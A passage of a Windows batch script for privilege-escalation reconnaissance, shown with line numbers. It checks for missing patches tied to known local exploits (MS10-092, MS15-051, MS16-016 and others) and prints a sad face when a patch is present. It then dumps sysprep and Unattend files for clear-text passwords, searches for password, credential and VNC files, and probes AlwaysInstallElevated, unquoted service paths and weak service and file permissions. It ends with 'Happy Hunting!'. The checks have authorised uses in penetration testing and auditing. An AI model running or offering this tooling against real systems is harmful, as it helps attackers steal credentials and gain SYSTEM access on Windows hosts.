Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" | find /i "KB2305420" 1>NUL 246 | IF not errorlevel 1 ( 247 | 248 | echo MS10-092 patch is installed :( 249 | 250 | ) ELSE ( 251 | 252 | echo MS10-092 patch is NOT installed! 253 | 254 | ) 255 | 256 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" | find /i "KB981957" 1>NUL 257 | IF not errorlevel 1 ( 258 | 259 | echo MS10-073 patch is installed :( 260 | 261 | ) ELSE ( 262 | 263 | echo MS10-073 patch is NOT installed! 264 | 265 | ) 266 | 267 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" | find /i "KB4013081" 1>NUL 268 | IF not errorlevel 1 ( 269 | 270 | echo MS17-017 patch is installed :( 271 | 272 | ) ELSE ( 273 | 274 | echo MS17-017 patch is NOT installed! 275 | 276 | ) 277 | 278 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" | find /i "KB977165" 1>NUL 279 | IF not errorlevel 1 ( 280 | 281 | echo MS10-015 patch is installed :( 282 | 283 | ) ELSE ( 284 | 285 | echo MS10-015 patch is NOT installed! 286 | 287 | ) 288 | 289 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" | find /i "KB941693" 1>NUL 290 | IF not errorlevel 1 ( 291 | 292 | echo MS08-025 patch is installed :( 293 | 294 | ) ELSE ( 295 | 296 | echo MS08-025 patch is NOT installed! 297 | 298 | ) 299 | 300 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" | find /i "KB920958" 1>NUL 301 | IF not errorlevel 1 ( 302 | 303 | echo MS06-049 patch is installed :( 304 | 305 | ) ELSE ( 306 | 307 | echo MS06-049 patch is NOT installed! 308 | 309 | ) 310 | 311 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" | find /i "KB914389" 1>NUL 312 | IF not errorlevel 1 ( 313 | 314 | echo MS06-030 patch is installed :( 315 | 316 | ) ELSE ( 317 | 318 | echo MS06-030 patch is NOT installed! 319 | 320 | ) 321 | 322 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" | find /i "KB908523" 1>NUL 323 | IF not errorlevel 1 ( 324 | 325 | echo MS05-055 patch is installed :( 326 | 327 | ) ELSE ( 328 | 329 | echo MS05-055 patch is NOT installed! 330 | 331 | ) 332 | 333 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" | find /i "KB890859" 1>NUL 334 | IF not errorlevel 1 ( 335 | 336 | echo MS05-018 patch is installed :( 337 | 338 | ) ELSE ( 339 | 340 | echo MS05-018 patch is NOT installed! 341 | 342 | ) 343 | 344 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" | find /i "KB842526" 1>NUL 345 | IF not errorlevel 1 ( 346 | 347 | echo MS04-019 patch is installed :( 348 | 349 | ) ELSE ( 350 | 351 | echo MS04-019 patch is NOT installed! 352 | 353 | ) 354 | 355 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" | find /i "KB835732" 1>NUL 356 | IF not errorlevel 1 ( 357 | 358 | echo MS04-011 patch is installed :( 359 | 360 | ) ELSE ( 361 | 362 | echo MS04-011 patch is NOT installed! 363 | 364 | ) 365 | 366 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" | find /i "KB841872" 1>NUL 367 | IF not errorlevel 1 ( 368 | 369 | echo MS04-020 patch is installed :( 370 | 371 | ) ELSE ( 372 | 373 | echo MS04-020 patch is NOT installed! 374 | 375 | ) 376 | 377 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" | find /i "KB2975684" 1>NUL 378 | IF not errorlevel 1 ( 379 | 380 | echo MS14-040 patch is installed :( 381 | 382 | ) ELSE ( 383 | 384 | echo MS14-040 patch is NOT installed! 385 | 386 | ) 387 | 388 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" | find /i "KB3136041" 1>NUL 389 | IF not errorlevel 1 ( 390 | 391 | echo MS16-016 patch is installed :( 392 | 393 | ) ELSE ( 394 | 395 | echo MS16-016 patch is NOT installed! 396 | 397 | ) 398 | 399 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" | find /i "KB3057191" 1>NUL 400 | IF not errorlevel 1 ( 401 | 402 | echo MS15-051 patch is installed :( 403 | 404 | ) ELSE ( 405 | 406 | echo MS15-051 patch is NOT installed! 407 | 408 | ) 409 | 410 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" | find /i "KB2989935" 1>NUL 411 | IF not errorlevel 1 ( 412 | 413 | echo MS14-070 patch is installed :( 414 | 415 | ) ELSE ( 416 | 417 | echo MS14-070 patch is NOT installed! 418 | 419 | ) 420 | 421 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2503665" | find /i "KB2503665" 1>NUL 422 | IF not errorlevel 1 ( 423 | 424 | echo MS11-046 patch is installed :( 425 | 426 | ) ELSE ( 427 | 428 | echo MS11-046 patch is NOT installed! 429 | 430 | ) 431 | 432 | @echo on 433 | 434 | rem #-------------------------# 435 | rem # File Transfer Utilities # 436 | rem #-------------------------# 437 | 438 | @echo off 439 | 440 | cscript /? 441 | powershell.exe /? 442 | tftp /? 443 | 444 | @echo on 445 | 446 | rem #-----------------------------# 447 | rem # Clear-text/base64 Passwords # 448 | rem #-----------------------------# 449 | 450 | @echo off 451 | 452 | type c:\sysprep.inf 453 | type c:\sysprep\sysprep.xml 454 | type %WINDIR%\Panther\Unattend\Unattended.xml 455 | type %WINDIR%\Panther\Unattended.xml 456 | dir /s *pass* 457 | dir /s *cred* 458 | dir /s *vnc* 459 | dir /s *.config 460 | 461 | @echo on 462 | 463 | rem #--------------# 464 | rem # Backup Files # 465 | rem #--------------# 466 | 467 | @echo off 468 | 469 | dir /s *backup* 470 | 471 | @echo on 472 | 473 | rem #----------------------------------# 474 | rem # *.MSI Install - SYSTEM privilege # 475 | rem #----------------------------------# 476 | 477 | @echo off 478 | 479 | rem This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1. 480 | rem This setting will allow low privilege user to install any .MSI as system! 481 | 482 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 483 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 484 | 485 | @echo on 486 | 487 | rem #------------------------# 488 | rem # Unquoted Service Paths # 489 | rem #------------------------# 490 | 491 | @echo off 492 | 493 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 494 | 495 | rem All commands from this point onward will require accesschk.exe 496 | rem Make sure you have accesschk.exe(old version) in same directory when you run the script! 497 | 498 | @echo on 499 | 500 | rem #---------------------# 501 | rem # Vulnerable Services # 502 | rem #---------------------# 503 | 504 | @echo off 505 | 506 | rem By default WinXP SP1 grant "Authenticated Users" SERVICE_ALL_ACCESS to "SSDPSRV" and "upnphost"! 507 | 508 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 509 | accesschk.exe /accepteula -uwcqv "Power Users" * 510 | accesschk.exe /accepteula -uwcqv "Users" * 511 | 512 | @echo on 513 | 514 | rem #-------------------------------# 515 | rem # Vulnerable Folder Permissions # 516 | rem #-------------------------------# 517 | 518 | @echo off 519 | 520 | accesschk.exe /accepteula -uwdqs "Users" c:\ 521 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 522 | 523 | @echo on 524 | 525 | rem #-----------------------------# 526 | rem # Vulnerable File Permissions # 527 | rem #-----------------------------# 528 | 529 | @echo off 530 | 531 | accesschk.exe /accepteula -uwqs "Users" c:\*.* 532 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 533 | 534 | @echo on 535 | 536 | rem #----------------# 537 | rem # Happy Hunting! # 538 | rem #----------------# 539 | 540 | @echo off 541 | --------------------------------------------------------------------------------